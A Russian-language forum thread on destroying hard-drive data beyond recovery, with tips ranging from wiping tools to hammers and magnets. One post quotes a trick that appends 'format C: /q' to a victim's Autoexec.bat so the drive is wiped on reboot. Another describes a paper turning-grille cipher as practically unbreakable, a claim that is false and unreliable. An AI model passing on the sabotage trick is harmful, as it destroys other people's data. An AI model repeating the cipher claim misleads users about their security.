Люди, у кого есть предложения, как можно по быстрому физически убить винт, кидайте сюда. Только поконкретнее будьте по возможности, я в этом ничего не понимаю.
попробуй несколько раз выключать питание при форматировании, попробуй низкоуровневое. на Fujitsu должно сработать)) Это если тебя чем-то не устраивает твой винт, а он еще на гарантии
не, мне надо данные на винте уничтожить, чтобы их не восстановили, а не сделать винт неработоспособным.
на www.mhteam.net есть прога в харакири называется (радел-разное)- вот она и уничтожит данные на винте и запишит вместо них случайные биты... короче востоновлению не подлежит!!!
Formatni vint i zapishi na eto mesto (ой чё это я) Форматни короче и забей винт под завязку хернёй всякой, лучше всего большими кусками (имиджами DVD к примеру) ничего сохранится не должно...
слышал про файл Autoexec.bat? Знаешь, что он грузится вместе с компом? Наверное, да. Так вот, он имеет расширение BAT. На что я намекаю? На то, что ты можешь в него прописать строчку, к примеру, "format C: /q" (прописывается она вот так: echo format C: /q >> c:\Autoexec.bat) и во время перезагрузки у жертвы отформатируется диск С. Это цитата D4rkGr3y
Вообщето даже после форматирования диска- информация сохраняется.... и если злобным дядям в погонах понадобиться- то её востоновят... а вот если на весь диск во все кластеры перезапишут всякие левые биты- то информация уже не подлежит востоновлению- или же я видел метод когда диск не уничтожался а подвергался криптографическому сдвигу информации- вот тогда то нужно ооочень долго возиться чтоб востоновить))) какой прогой это делать я уже ранее говорил- харакири!!!!
Если бы этим пацаном заинтересовались ограны, то мы тут его уже бы не видели... хотя чё-то он давно не заходит ))) silveran способ о переписи информация я уже предлогал =) p/s/ интересно, надо узнать что такое криптографический сдвиг звучит круто )
крипторгафический сдвиг- это когда вся информация представляется в виде спиральной башни.... стоит её чучь чуть повернуть и (образно говоря окна будут смотреть не на юг а на север)))) возми к примеру квадрат 8 на 8... раздели его на 4 части (линия по вертикали и горизонтали ровно по середине,) полиучлось 4 квадрата каждый 4 на 4 ..пронумеруй эти квадраты по часовой стрелке1,2,3,4 теперь в 1 квадрате пронумеруй ячейки с права на лево 1,2,3,4 вниз и 5,6,7,8..... и так все 16....получится такая картина: большол квадрат поделен на 4 части и в самой верхней левой части пронумерованны ячейки от 1 до 16. теперь поверни большой квадрат на 90 градусов и пронумеруй уже 4 большой квадрат опять от 1 до 16... и так вот поворачивая большой квадрат пронумеруй все 4 части.....теперь лезвием вырежи в любой из частей ячейку-1, потом в любой другой части ячейку-2... и так далее.... теперь когда ты положиш свой большой квадрат на лит бумаги то увидеш что у тебя в нём 16 вырезанных ячеек- вот туда то и вписывай свой текст по буквам с права не лева с верху в низ, после 16 букв (пустые ячейки закончились) поверни квадрат на 90 градусов и продолжай.... и так 4 раза... теперь когда ты снимиш квадрат с бумаги то увидеш набор букв 8 строк по 8 букв... и прочитать это возможно только имея тобой сотворённый квадрат-- вот что значит криптокрафический сдвиг!!! это возможно и самому написать используя виртуальный квадрат скажем 100 на 100... ниодин криптограф не расшишрует твой хард (было бы что так беречь))))!!!!
После формата вся инфа остается. Правда подтирается чтото в ф. системе, остаются только содержимое файлов. Но восстановить можно - 100%. Самое надежное средство - молоток и магнит
))) был у меня печальный опыт формата- востоновил!!))))) а вот с молотком и гвоздями не прбывал...))))))))))
криптографический сдвиг хорошая штука =))) пока читал голова разболелась не смог представить всю эту фигню
Вот блин, заинтересовал криптографическим сдвигом и пришлось лезть за тетрадью чтобы сделать этот квадрат =)
Замучался работать лезвием, но всё-таки сделал этот квадрат, стало всё понятнее. Действительно получается такая фигня, что расшифровать не реально. Может только брутфорсом Наугад квадраты вырезать и подбирать =)
Все кластеры на диске-это теже квадраты... а теперь представь себе такой квадрат с несколькими десятками тысячь ячеек... без ключа- лет этак 10 на сан макросистемском сервере бруфостить придётся.... а для более простого решения я уже предлогал прогу- харакири (читать выше)...........